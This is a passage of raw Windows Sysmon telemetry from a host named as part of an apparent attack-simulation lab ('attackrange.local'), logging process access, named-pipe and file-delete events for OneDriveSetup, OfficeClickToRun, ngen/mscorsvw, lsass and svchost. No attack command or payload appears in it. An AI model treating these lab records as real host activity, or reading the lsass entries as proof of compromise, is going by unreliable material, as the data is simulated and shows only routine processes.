Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b13a(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+29b8a|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a27d 10341000x800000000000000078209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.857{A7A01FEF-B626-607E-1600-00000000BB01}15402648C:\Windows\system32\svchost.exe{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.857{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.842{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33082348C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\windows.storage.dll+1e3f2a(wow64)|C:\Windows\System32\windows.storage.dll+10ad68(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+29b8a|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a27d|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a167|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+5feaa|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+67b89 10341000x800000000000000078202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.842{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33082348C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3f1c(wow64)|C:\Windows\System32\windows.storage.dll+10ad68(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+29b8a|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a27d 10341000x800000000000000078201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.842{A7A01FEF-EBFE-607E-1F0E-00000000BB01}33082348C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3f1c(wow64)|C:\Windows\System32\windows.storage.dll+10ad68(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+29b8a|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a27d|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+2a167 10341000x800000000000000078200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.842{A7A01FEF-B624-607E-0B00-00000000BB01}8605844C:\Windows\system32\lsass.exe{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.842{A7A01FEF-B624-607E-0B00-00000000BB01}8605844C:\Windows\system32\lsass.exe{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.826{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBFE-607E-220E-00000000BB01}6244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.826{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EBFE-607E-220E-00000000BB01}6244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000078189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.810{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\d0829a.msiMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000078188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.748{A7A01FEF-B626-607E-1300-00000000BB01}12642404C:\Windows\System32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.732{A7A01FEF-C0A3-607E-6C05-00000000BB01}36242592C:\Windows\system32\csrss.exe{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.732{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44844816C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e69f|C:\Windows\System32\windows.storage.dll+16e315|C:\Windows\System32\windows.storage.dll+16de06|C:\Windows\System32\windows.storage.dll+16f278|C:\Windows\System32\windows.storage.dll+16dc2e|C:\Windows\System32\windows.storage.dll+fd025|C:\Windows\System32\windows.storage.dll+fd3a4|C:\Windows\System32\windows.storage.dll+fc9e0|C:\Windows\System32\SHELL32.dll+3cd0f|C:\Windows\System32\SHELL32.dll+3cb9c|C:\Windows\System32\SHELL32.dll+3c8ec|C:\Windows\System32\SHELL32.dll+e2187|C:\Windows\System32\SHELL32.dll+e20e5|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+39344a|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4e795a|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a6902|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+454fec|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7 10341000x800000000000000078180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.717{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBFE-607E-210E-00000000BB01}1628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.701{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBFE-607E-210E-00000000BB01}1628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.701{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EBFE-607E-210E-00000000BB01}1628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.685{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBFE-607E-200E-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.654{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fc6e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 